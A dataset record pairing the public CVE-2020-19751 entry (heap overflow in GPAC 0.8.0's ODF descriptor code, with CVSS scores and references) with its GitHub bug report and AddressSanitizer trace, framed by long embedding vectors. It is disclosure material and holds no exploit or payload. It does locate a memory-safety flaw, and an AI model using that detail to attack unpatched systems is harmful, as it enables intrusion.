0.01636083982884884, -0.01623665913939476, -0.0037487123627215624, -0.0009294167975895107, 0.0005510529736056924, -0.01122285332530737, 0.009965521283447742, 0.027583692222833633, 0.026590244844555855, -0.011618679389357567, 0.01211540400981903, 0.008141613565385342, -0.001363079878501594, -0.024727530777454376, 0.0011195688275620341, -0.01813041791319847, 0.006166360341012478, 0.0308589655905962, 0.01079598069190979, -0.008801324293017387, 0.00717533053830266, 0.00739652756601572, -0.004063045140355825, -0.00870042759925127, -0.017121447250247, -0.00841325893998146, 0.0048469374887645245, -0.03188345953822136, 0.0016124119283631444, 0.00409020995721221, -0.011129717342555523, -0.017168015241622925, -0.013527961447834969, 0.02347019873559475, -0.051379866898059845, 0.0025806352496147156, -0.0012883773306384683, -0.007796234916895628, -0.019092820584774017, 0.0012175553711131215, -0.0031995996832847595, -0.007462498731911182, 0.01710592582821846, -0.016438452526926994, 0.01116076298058033, 0.00027916458202525973, -0.029881039634346962, 0.006472931709140539, -0.03536052629351616, -0.009771488606929779, -0.012938102707266808, 0.012076596729457378, -0.022507796064019203, -0.000013089629646856338, -0.012798398733139038, -0.019108343869447708, 0.0023070492316037416, -0.0011224793270230293, 0.02334601804614067, 0.006686368025839329, -0.008203703910112381, -0.011409124359488487, -0.011641963385045528, -0.0195584986358881, 0.006278899032622576, -0.016034863889217377, 0.0011195688275620341, 0.0017123388824984431, 0.014467080123722553, -0.020815830677747726, 0.005991730839014053, -0.017012789845466614, -0.0045636496506631374, 0.0008202733588404953, -0.03042433224618435, 0.014948281459510326, 0.008203703910112381, -0.006399199366569519, 0.01160315703600645, -0.027568170800805092, 0.03787519037723541, -0.020940011367201805, 0.042407792061567307, 0.007629367057234049, -0.0032616902608424425, -0.010640755295753479, 0.02451021410524845, 0.0015813667559996247, -0.01130822766572237, 0.015413960441946983, -0.010578664019703865, 0.006240092683583498, -0.00840549822896719, 0.0072257788851857185, -0.015087985433638096, 0.018782367929816246, 0.008917744271457195, 0.00019645813154056668, 0.005755010526627302, -0.009655068628489971, -0.007004581391811371, -0.003927222453057766, 0.026419496163725853, -0.007901012897491455, -0.011510021053254604, 0.011331511661410332, -0.0034091549459844828, -0.024463646113872528, -0.011207330040633678, -0.011967938393354416, -0.027226673439145088, -0.004594694823026657, 0.032535407692193985, 0.024370510131120682, 0.0008270645048469305, 0.0037991609424352646, 0.016593679785728455, 0.018782367929816246, 0.0065660676918923855, -0.004784847144037485, 0.009592978283762932, 0.0034576633479446173, -0.012433617375791073, -0.009561932645738125, 0.010128508321940899, -0.003562440862879157, 0.004940073471516371, 0.00009422714356333017, -0.004815892316401005, 0.01123061403632164, -0.002607799833640456, 0.010749413631856441, 0.010594187304377556, 0.0018947295611724257, 0.007920416072010994, 0.026419496163725853, -0.0059800888411700726, -0.023159746080636978, 0.011572112329304218, 0.004548127297312021, 0.0031006429344415665, -0.00011441867536632344, -0.00442006578668952, 0.0004676188691519201, 0.006174121517688036, 0.012767354026436806, 0.013163180090487003, -0.014901713468134403, -0.001506664091721177, -0.011199569329619408, 0.004136777948588133, -0.007986387237906456, 0.029881039634346962, 0.005836504511535168, -0.01442051213234663, 0.019915519282221794, 0.015134552493691444, 0.008164897561073303, -0.0000606958637945354, 0.0030482541769742966, -0.003791399532929063, -0.009655068628489971, -0.014870668761432171, -0.003657517023384571, 0.003690502606332302, 0.015670083463191986, 0.0020800309721380472, -0.011199569329619408, -0.008025193586945534, 0.0021460019052028656, 0.0023089894093573093, -0.004229913465678692, -0.022988997399806976, 0.004823653493076563, -0.002287645824253559, 0.037347421050071716, -0.0023225718177855015, -0.008219226263463497, -0.0007247122703120112, 0.010625232011079788, 0.010400154627859592, -0.006457409355789423, 0.00899535696953535, -0.0351121611893177, 0.014754248782992363, -0.007586679887026548, 0.014133344404399395, -0.019232524558901787, 0.006492335349321365, -0.01000432763248682, 0.006779503542929888, -0.019480885937809944, 0.02665233612060547, -0.024727530777454376, 0.00696189422160387, 0.02362542599439621, -0.010532096959650517, -0.012876012362539768, -0.020955534651875496, -0.007144284900277853, -0.006294421851634979, 0.010415676981210709, 0.0033664677757769823, -0.02011731266975403, 0.006930849049240351, -0.0005888893501833081, 0.005378587171435356, -0.03045537695288658, -0.011579873040318489, 0.014684396795928478, -0.027040401473641396, -0.0074702599085867405, -0.016950698569417, 0.015825308859348297, 0.024106625467538834, -0.024556782096624374, 0.012899295426905155, -0.007908773608505726, 0.02162300795316696, 0.007586679887026548, 0.012014506384730339, 0.020194927230477333, -0.0014484543353319168, -0.01650054380297661, 0.010392392985522747, -0.017478467896580696, -0.01941879466176033, 0.0003009932697750628, -0.01881341263651848, -0.026900697499513626, 0.0018782367696985602, 0.027459511533379555, 0.005134106148034334, -0.0015231568831950426, -0.0011719577014446259, -0.00315303192473948, 0.0031258673407137394, -0.021483303979039192, 0.006084866356104612, -0.002968700835481286, -0.0018326391000300646, -0.002953178249299526, 0.0022740636486560106, -0.012286152690649033, -0.0010138209909200668, 0.005712323356419802, -0.01064851600676775, 0.008296839892864227, 0.017276674509048462, -0.012138688005506992, 0.011354795657098293, 0.012852728366851807, -0.011323750019073486, 0.01528977882117033, 0.008646097965538502, 0.002048985566943884, 0.000931842194404453, -0.025643365457654, 0.016578156501054764, -0.006461289711296558, 0.0013834533747285604, -0.014117821119725704, -0.008397736586630344, -0.01957402192056179, -0.0011525544105097651, -0.005743368994444609, -0.023097656667232513, 0.012340481393039227, 0.007431453559547663, -0.00037302792770788074, -0.03290795162320137, 0.015910683199763298, 0.007784592919051647, 0.021343600004911423, 0.02798728086054325, -0.008211465552449226, 0.013178703375160694, 0.009670590981841087, 0.006923087872564793, -0.007924296893179417, 0.0041600619442760944, 0.01223958469927311, -0.01842534728348255, 0.014451557770371437, -0.02593829482793808, -0.009608500637114048, -0.04808907210826874, 0.010601948015391827, -0.0036497556138783693, -0.005638591013848782, -0.0006213898304849863, 0.0009531857795082033, 0.0075362310744822025, 0.00181226572021842, 0.0002980827703140676, -0.00594516284763813, -0.002184808487072587, -0.0010797921568155289, -0.010454483330249786, -0.005852027330547571, 0.0063487510196864605, 0.016593679785728455, -0.012348243035376072, -0.01081150397658348, 0.0024428721517324448, -0.0013456169981509447, 0.02379617467522621, -0.009189389646053314, 0.014389467425644398, -0.01940327323973179, -0.01261988840997219, -0.016469497233629227, -0.00674069719389081, -0.0027281001675873995, -0.006422483362257481, -0.010904639028012753, -0.0005670606624335051, 0.015111269429326057, -0.006321586202830076, 0.005937401670962572, -0.006181882694363594, -0.0005423214752227068, 0.01696622185409069, -0.01166524738073349, -0.0027901907451450825, -0.015685606747865677, 0.01653158850967884, 0.020350152626633644, 0.0031879576854407787, -0.028080416843295097, 0.0232063140720129, 0.02957058884203434, -0.02246122807264328, -0.024137672036886215, -0.02578306943178177, 0.014661112800240517, -0.037161149084568024, -0.0017909221351146698, 0.0037021443713456392, 0.017121447250247, 0.005867549683898687, 0.012643172405660152, -0.003762294538319111, 0.00986462365835905, -0.0021576439030468464, 0.0024952609091997147, 0.0223370473831892, -0.014490364119410515, -0.0032772128470242023, 0.02244570665061474, -0.012449139729142189, -0.0232063140720129, -0.010896878316998482, -0.0017045774729922414, -0.003172435099259019, 0.020676128566265106, 0.005487245507538319, 0.0010089701972901821, -0.008219226263463497, -0.004222152289003134, -0.004354094620794058, 0.00004380895188660361, 0.02783205546438694, 0.008102807216346264, 0.01594172976911068, 0.023842742666602135, 0.020365675911307335, 0.012860489077866077, -0.015615753829479218, -0.004586933646351099, -0.007299511227756739, -0.01896863989531994, 0.009367899969220161, 0.006589351687580347, -0.006938610225915909, -0.010578664019703865, 0.0060072531923651695, 0.0073771243914961815, -0.0012583022471517324, -0.016888609156012535, 0.011277182027697563, 0.0004416670126374811, 0.006860997527837753, 0.0003465909685473889, -0.010601948015391827, -0.004905147477984428, 0.01929461397230625, -0.0019868952222168446, -0.001627934630960226, -0.006205166690051556, 0.000007101901246642228, 0.0036303524393588305, 0.0035605006851255894, -0.019201477989554405, 0.014117821119725704, -0.008048477582633495, -0.014428273774683475, 0.001270914333872497, 0.0053553031757473946, -0.019201477989554405, -0.012868250720202923, -0.020101791247725487, -0.008630575612187386, 0.011323750019073486, 0.006686368025839329, 0.01766473986208439, -0.009057448245584965, -0.018301166594028473, 0.031945548951625824, 0.008141613565385342, -0.009228196926414967, -0.0006407930632121861, -0.0007610933971591294, 0.02260093204677105, -0.010617471300065517, -0.02000865526497364, -0.015134552493691444, -0.0012951684184372425, -0.011059865355491638, 0.0010380750754848123, -0.003209301270544529, -0.01840982586145401, -0.004334690980613232, 0.016997266560792923, 0.002074209973216057, -0.003554679686203599, 0.01654711179435253, -0.03967581316828728, 0.01203002966940403, 0.001318452414125204, 0.007388766389340162, 0.009259241633117199, 0.0025767546612769365, -0.0018442810978740454, -0.010578664019703865, 0.009748204611241817, 0.013124373741447926, 0.00048459673416800797, 0.024463646113872528, 0.00514962850138545, -0.00009980558388633654, 0.002619441831484437, 0.006457409355789423, -0.004540365654975176, 0.013931550085544586, 0.009034164249897003, 0.005304854828864336, -0.02201107330620289, -0.017882056534290314, -0.012076596729457378, -0.007078314200043678, 0.0016832338878884912, -0.0071326433680951595, 0.006368154194205999, 0.001787041430361569, -0.007082194555550814, -0.006763980723917484, -0.009639546275138855, -0.011502260342240334, -0.014280809089541435, 0.013163180090487003, -0.003956327214837074, 0.0029861635994166136, 0.0032966160215437412, -0.006713532377034426, 0.007815638557076454, 0.020940011367201805, 0.023997968062758446, -0.014047970063984394, -0.0162521805614233, 0.005968446843326092, 0.010384631343185902, -0.014909475110471249, -0.010043133981525898, -0.010260450653731823, -0.0038108027074486017, -0.0021615244913846254, 0.0212970320135355, 0.03787519037723541, -0.002607799833640456, -0.013287361711263657, -0.00398543244227767, 0.007769070565700531, -0.0017346525564789772, 0.014637828804552555, -0.0016153224278241396, -0.007590560242533684, -0.005359183996915817, 0.007136523723602295, 0.01165748666971922, -0.008289078250527382, 0.005576500669121742, 0.02461887337267399, -0.004575291648507118, 0.012402571737766266, 0.05479484423995018, 0.00971715897321701, 0.0179907139390707, -0.00010696054232539609, -0.004222152289003134, -0.008832369931042194, -0.003120046341791749, 0.009600738994777203, 0.023283926770091057, 0.0003769085742533207, -0.0075362310744822025, 0.0003783638239838183, -0.006368154194205999, 0.020365675911307335, 0.0016861443873494864, 0.0011438229121267796, 0.006372035015374422, -0.01530530210584402, 0.011564350686967373, -0.003554679686203599, 0.005448439158499241, 0.0021751068998128176, 0.009235957637429237, 0.007691457401961088, -0.017742352560162544, 0.009724920615553856, 0.02333049476146698, -0.010012089274823666, -0.00979477260261774, -0.00326363043859601, -0.00110501644667238, -0.001182629493996501, -0.02953954227268696, 0.014094537124037743, 0.004039761610329151, -0.0186892319470644, -0.010943446308374405, 0.0000023344562123384094, 0.00775742856785655, 0.002085851738229394, 0.004909027833491564, -0.00861505325883627, -0.022119730710983276, 0.0012146448716521263, -0.0028348180931061506, 0.009018640965223312, 0.01536739245057106, -0.01853400655090809, -0.005266048479825258, -0.007105478551238775, -0.0023303329944610596, -0.005968446843326092, -0.020101791247725487, 0.01168077066540718, -0.019170433282852173, 0.002873624674975872, -0.01853400655090809, 0.00818041991442442, -0.012829444371163845, -0.009220435284078121, 0.0019199538510292768, -0.001506664091721177, -0.00518067367374897, -0.00551052950322628, 0.0030560155864804983, 0.011556589044630527, -0.014443796128034592, 0.002638845006003976, 0.002217794070020318, 0.006678606383502483, 0.003488708520308137, -0.0012699442449957132, 0.0037700559478253126, 0.010850310325622559, 0.0020916727371513844, -0.00884013157337904, 0.006465170532464981, 0.026326360180974007, -0.003771996358409524, 0.01594172976911068, -0.009957759641110897, -0.0004630105977412313, 0.011494498699903488, -0.02955506555736065, -0.0009643426747061312, -0.011641963385045528, 0.008646097965538502, -0.009911191649734974, -0.0011205390328541398, 0.010632993653416634, -0.005529932677745819, -0.008778040297329426, 0.011207330040633678, 0.010881355032324791, -0.002984223421663046, -0.0038554302882403135, 0.0014833802124485373, -0.0008794533205218613, 0.011797189712524414, -0.001396065461449325, 0.028080416843295097, 0.011579873040318489, 0.003727368777617812, -0.00699293939396739, 0.008723711594939232, 0.012899295426905155, 0.021234942600131035, -0.0008726621745154262, 0.03526739031076431, 0.008824608288705349, 0.009088492952287197, -0.001554202171973884, -0.020629560574889183, 0.009887907654047012, -0.021840324625372887, -0.009499842301011086, -0.004967237822711468, -0.0005127314943820238, -0.032255999743938446, -0.01247242372483015, 0.002784369746223092, -0.0249448474496603, -0.005708443000912666, 0.01334169041365385, 0.013271838426589966, -0.010384631343185902, 0.019465362653136253, -0.014327377080917358, 0.027661306783556938, 0.03421185165643692, -0.009142822585999966, 0.012565559707581997, -0.011463453993201256, 0.01912386529147625, 0.0032539288513362408, 0.0003470760420896113, -0.005134106148034334, 0.013419303111732006, -0.03377721831202507, 0.010757174342870712, -0.02739742211997509, 0.002177047310397029, 0.008964312262833118, -0.014040208421647549, -0.0023885429836809635, 0.012231823056936264, 0.02418424002826214, 0.022585410624742508, -0.003529455279931426, -0.0014950222102925181, 0.010446722619235516, 0.017478467896580696, -0.001094344537705183, -0.00031772858346812427, -0.014971565455198288, -0.0186892319470644, 0.0072257788851857185, -0.006492335349321365, 0.006857116706669331, 0.011269421316683292, 0.056005608290433884, 0.006938610225915909, -0.027475034818053246, 0.020971057936549187, -0.016407407820224762, -0.01449812576174736, -0.005867549683898687, 0.004338571801781654, -0.00041983832488767803, -0.005312616005539894, -0.0017365929670631886, -0.0034207969438284636, 0.006465170532464981, -0.014754248782992363, -0.012247346341609955, -0.006860997527837753, -0.0111685236915946, 0.01079598069190979, -0.0020198808051645756, -0.016717860475182533, -0.004295884631574154, 0.021110760048031807, 0.018922071903944016, 0.005817101337015629, 0.021250464022159576, -0.005444558337330818, -0.002567053074017167, 0.01036134734749794, -0.005145748145878315, -0.021762710064649582, 0.018083849921822548, 0.007070552557706833, 0.014630068093538284, 0.0026757114101201296, 0.012844966724514961, -0.0006082925829105079, -0.022678544744849205, 0.006364273373037577, 0.0005641501629725099, -0.032255999743938446, -0.00797862559556961, -0.007675934582948685, -0.01650054380297661, -0.003746771952137351, -0.030765829607844353, -0.002652427414432168, 0.011502260342240334, 0.0035197536926716566, 0.012976909056305885, 0.02188689261674881, 0.005859788507223129, 0.009313571266829967, 0.02114180661737919, 0.004943953827023506, 0.004780966322869062, -0.0066592032089829445, 0.002825116505846381, -0.005235002841800451, -0.004187226295471191, 0.017928624525666237, 0.0038399077020585537, -0.002955118427053094, -0.010780458338558674, 0.011704054661095142, -0.023858264088630676, -0.0010565081611275673, -0.003001686418429017, 0.019931042566895485, 0.004226032644510269, 0.02232152596116066, 0.008063999935984612, -0.010330302640795708, 0.0014620366273447871, -0.0024661559145897627, -0.0030560155864804983, -0.0035682618618011475, 0.011121955700218678, -0.007237420883029699, 0.00362453144043684, -0.000972589070443064, -0.015708889812231064, 0.006686368025839329, -0.004051403608173132, -0.01809937320649624, -0.02292690798640251, 0.007551753893494606, -0.005704562179744244, -0.005312616005539894, -0.013667665421962738, 0.006604874040931463, 0.010594187304377556, 0.030067311599850655, 0.0064108413644135, 0.0025651126634329557, 0.024370510131120682, -0.026590244844555855, -0.021203896030783653, -0.0017986834282055497, -0.0015153955901041627, -0.0031258673407137394, 0.012953625060617924, -0.01650054380297661, -0.015483811497688293, 0.01159539632499218, 0.011114194989204407, -0.020660605281591415, -0.031215986236929893, -0.0061585986986756325, -0.009065208956599236, 0.00014128007751423866, 0.022942429408431053, 0.0111685236915946, -0.02028806135058403, -0.01794414594769478, -0.009321331977844238, -0.0036672186106443405, -0.009608500637114048, 0.008746995590627193, 0.01433513779193163, -0.0018365198047831655, -0.013908266089856625, -0.00078825798118487, 0.029011772945523262, 0.0019694322254508734, 0.009949997998774052, -0.008933266624808311, -0.015708889812231064, 0.01709040254354477, 0.001660920213907957, 0.00047562274266965687, 0.003172435099259019, 0.0006412781658582389, 0.012270629405975342, -0.016453975811600685, -0.018906548619270325, 0.0045442464761435986, 0.004113493952900171, 0.03259749710559845, 0.010594187304377556, 0.000644673767965287, -0.011315988376736641, 0.07003805041313171, -0.0032151222694665194, -0.009367899969220161, -0.02997417561709881, 0.0075944410637021065, 0.003381990361958742, 0.024991415441036224, -0.010105224326252937, -0.02002417854964733, 0.003709905780851841, 0.005378587171435356, 0.02114180661737919, 0.017633695155382156, -0.012224062345921993, 0.012169732712209225, 0.009150583297014236, 0.010570903308689594, -0.008917744271457195, 0.008801324293017387, -0.0046955919824540615, 0.001916073146276176, 0.006069344002753496, 0.0014717382146045566, 0.01027597300708294, -0.000990537111647427, 0.003325721016153693, 0.011735099367797375, 0.01768026314675808, -0.011044343002140522, -0.013178703375160694, -0.008459826931357384, -0.018751323223114014, 0.0049129086546599865, 0.02070717327296734, 0.007357721216976643, 0.0027436227537691593, 0.010539857670664787, 0.014342899434268475, 0.014971565455198288, 0.008917744271457195, -0.010019849985837936, -0.03132464364171028, -0.0011185987386852503, 0.03781309723854065, -0.004342452622950077, -0.00428036181256175, -0.013675427064299583, 0.0008876997162587941, 0.012922579422593117, 0.004839176312088966, -0.007718621753156185, 0.00696189422160387, -0.00007870452827773988, -0.007963103242218494, 0.010842548683285713, 0.0008978864643722773, 0.0014989027986302972, 0.027071446180343628, -0.00011065928993048146, 0.014342899434268475, -0.012736308388411999, 0.014513648115098476, 0.028344301506876945 ]
CVE-2020-19751
2021-09-07T20:15:07.443000
An issue was discovered in gpac 0.8.0. The gf_odf_del_ipmp_tool function in odf_code.c has a heap-based buffer over-read.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/126.html" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1272" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1272
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [✔ ] I looked for a similar issue and couldn't find any. - [✔ ] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ ✔] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ in odf_code.c [line3295](https://github.com/gpac/gpac/blob/1310ba63e7b928e2ae7546f3c88a9b0f06a76e0d/src/odf/odf_code.c#L3295 ) The check for size here may have some problems.It will cause a heap overflow.And it will resulting in gf_odf_del_ipmp_tool to free a invalid address. Here is the asan's result: ``` [ODF] Error reading descriptor (tag 3 size 0): Invalid MPEG-4 Descriptor ================================================================= ==19708== ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602c0000ff68 at pc 0x7f448e47044d bp 0x7ffd384c3670 sp 0x7ffd384c2e30 WRITE of size 16 at 0x602c0000ff68 thread T0 #0 0x7f448e47044c (/usr/lib/x86_64-linux-gnu/libasan.so.0.0.0+0xe44c) #1 0x43efa1 (/home/lcy/gpac-master/bin/gcc/MP4Box+0x43efa1) #2 0x56cd48 (/home/lcy/gpac-master/bin/gcc/MP4Box+0x56cd48) #3 0x562335 (/home/lcy/gpac-master/bin/gcc/MP4Box+0x562335) #4 0x56d4c7 (/home/lcy/gpac-master/bin/gcc/MP4Box+0x56d4c7) #5 0x6d4b48 (/home/lcy/gpac-master/bin/gcc/MP4Box+0x6d4b48) #6 0x51d2ab (/home/lcy/gpac-master/bin/gcc/MP4Box+0x51d2ab) #7 0x51d814 (/home/lcy/gpac-master/bin/gcc/MP4Box+0x51d814) #8 0x524cb5 (/home/lcy/gpac-master/bin/gcc/MP4Box+0x524cb5) #9 0x525b2e (/home/lcy/gpac-master/bin/gcc/MP4Box+0x525b2e) #10 0x41cb6b (/home/lcy/gpac-master/bin/gcc/MP4Box+0x41cb6b) #11 0x7f448d75bf44 (/lib/x86_64-linux-gnu/libc-2.19.so+0x21f44) #12 0x40f2fd (/home/lcy/gpac-master/bin/gcc/MP4Box+0x40f2fd) 0x602c0000ff68 is located 0 bytes to the right of 360-byte region [0x602c0000fe00,0x602c0000ff68) allocated by thread T0 here: #0 0x7f448e47741a (/usr/lib/x86_64-linux-gnu/libasan.so.0.0.0+0x1541a) #1 0x56cb6d (/home/lcy/gpac-master/bin/gcc/MP4Box+0x56cb6d) Shadow bytes around the buggy address: 0x0c05ffff9f90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c05ffff9fa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c05ffff9fb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c05ffff9fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c05ffff9fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c05ffff9fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00[fa]fa fa 0x0c05ffff9ff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c05ffffa000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c05ffffa010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c05ffffa020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c05ffffa030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap righ redzone: fb Freed Heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 ASan internal: fe ==19708== ABORTING ```
in odf_code.c line3295 have a heap-buffer-overflow
https://api.github.com/repos/gpac/gpac/issues/1272/comments
1
2019-07-08T12:35:13
2019-07-09T16:32:53Z
https://github.com/gpac/gpac/issues/1272
465,232,934
1,272
true
This is a GitHub Issue repo:gpac owner:gpac Title : in odf_code.c line3295 have a heap-buffer-overflow Issue date: --- start body --- Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [✔ ] I looked for a similar issue and couldn't find any. - [✔ ] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ ✔] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ in odf_code.c [line3295](https://github.com/gpac/gpac/blob/1310ba63e7b928e2ae7546f3c88a9b0f06a76e0d/src/odf/odf_code.c#L3295 ) The check for size here may have some problems.It will cause a heap overflow.And it will resulting in gf_odf_del_ipmp_tool to free a invalid address. Here is the asan's result: ``` [ODF] Error reading descriptor (tag 3 size 0): Invalid MPEG-4 Descriptor ================================================================= ==19708== ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602c0000ff68 at pc 0x7f448e47044d bp 0x7ffd384c3670 sp 0x7ffd384c2e30 WRITE of size 16 at 0x602c0000ff68 thread T0 #0 0x7f448e47044c (/usr/lib/x86_64-linux-gnu/libasan.so.0.0.0+0xe44c) #1 0x43efa1 (/home/lcy/gpac-master/bin/gcc/MP4Box+0x43efa1) #2 0x56cd48 (/home/lcy/gpac-master/bin/gcc/MP4Box+0x56cd48) #3 0x562335 (/home/lcy/gpac-master/bin/gcc/MP4Box+0x562335) #4 0x56d4c7 (/home/lcy/gpac-master/bin/gcc/MP4Box+0x56d4c7) #5 0x6d4b48 (/home/lcy/gpac-master/bin/gcc/MP4Box+0x6d4b48) #6 0x51d2ab (/home/lcy/gpac-master/bin/gcc/MP4Box+0x51d2ab) #7 0x51d814 (/home/lcy/gpac-master/bin/gcc/MP4Box+0x51d814) #8 0x524cb5 (/home/lcy/gpac-master/bin/gcc/MP4Box+0x524cb5) #9 0x525b2e (/home/lcy/gpac-master/bin/gcc/MP4Box+0x525b2e) #10 0x41cb6b (/home/lcy/gpac-master/bin/gcc/MP4Box+0x41cb6b) #11 0x7f448d75bf44 (/lib/x86_64-linux-gnu/libc-2.19.so+0x21f44) #12 0x40f2fd (/home/lcy/gpac-master/bin/gcc/MP4Box+0x40f2fd) 0x602c0000ff68 is located 0 bytes to the right of 360-byte region [0x602c0000fe00,0x602c0000ff68) allocated by thread T0 here: #0 0x7f448e47741a (/usr/lib/x86_64-linux-gnu/libasan.so.0.0.0+0x1541a) #1 0x56cb6d (/home/lcy/gpac-master/bin/gcc/MP4Box+0x56cb6d) Shadow bytes around the buggy address: 0x0c05ffff9f90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c05ffff9fa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c05ffff9fb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c05ffff9fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c05ffff9fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c05ffff9fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00[fa]fa fa 0x0c05ffff9ff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c05ffffa000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c05ffffa010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c05ffffa020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c05ffffa030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap righ redzone: fb Freed Heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 ASan internal: fe ==19708== ABORTING ``` --- end body ---
3,950
[ -0.02056712843477726, 0.033783383667469025, -0.007423615548759699, 0.01261134073138237, 0.03353835642337799, 0.00614869873970747, -0.006703842431306839, 0.04536100849509239, -0.02502359449863434, 0.028438687324523926, -0.021761644631624222, -0.0007748087518848479, 0.02219044603407383, 0.014012600295245647, 0.013223913498222828, 0.013690999709069729, -0.017519580200314522, 0.015712490305304527, -0.01658540591597557, -0.0038190078921616077, 0.028653088957071304, -0.04358454793691635, 0.010222307406365871, 0.07620404660701752, -0.011125851422548294, 0.0020234042312949896, -0.02313993312418461, 0.004885267466306686, 0.013101398944854736, 0.01203705370426178, -0.01318562775850296, 0.00428035156801343, 0.0012806598097085953, 0.012733855284750462, 0.03261949494481087, 0.019495125859975815, 0.04888330027461052, 0.06064469739794731, -0.005995555315166712, -0.0028063487261533737, -0.014318887144327164, -0.03920465335249901, -0.042053114622831345, 0.026233425363898277, 0.010467336513102055, -0.0036945792380720377, 0.009196247905492783, -0.0057007549330592155, -0.061931099742650986, -0.012082996778190136, 0.03384464234113693, -0.01675386354327202, -0.043247632682323456, -0.04964901879429817, -0.011033966206014156, -0.016968263313174248, 0.022175131365656853, 0.023048048838973045, 0.014923802576959133, 0.00614869873970747, -0.027075713500380516, -0.00409658020362258, -0.0069718430750072, 0.014272944070398808, 0.005417440086603165, -0.010222307406365871, -0.011056937277317047, 0.031578123569488525, -0.02600371092557907, 0.008177845738828182, -0.0015582317719236016, -0.014249972999095917, -0.006167841609567404, 0.026937885209918022, 0.012335683219134808, -0.01059750746935606, 0.023415591567754745, 0.007465729955583811, -0.03678499162197113, 0.02673879824578762, -0.03853082284331322, 0.01879066787660122, -0.0109880231320858, 0.0078103020787239075, 0.001330431317910552, -0.005869212094694376, -0.028821546584367752, -0.06536150723695755, -0.03773447871208191, -0.016095347702503204, -0.00856070313602686, 0.013461285270750523, 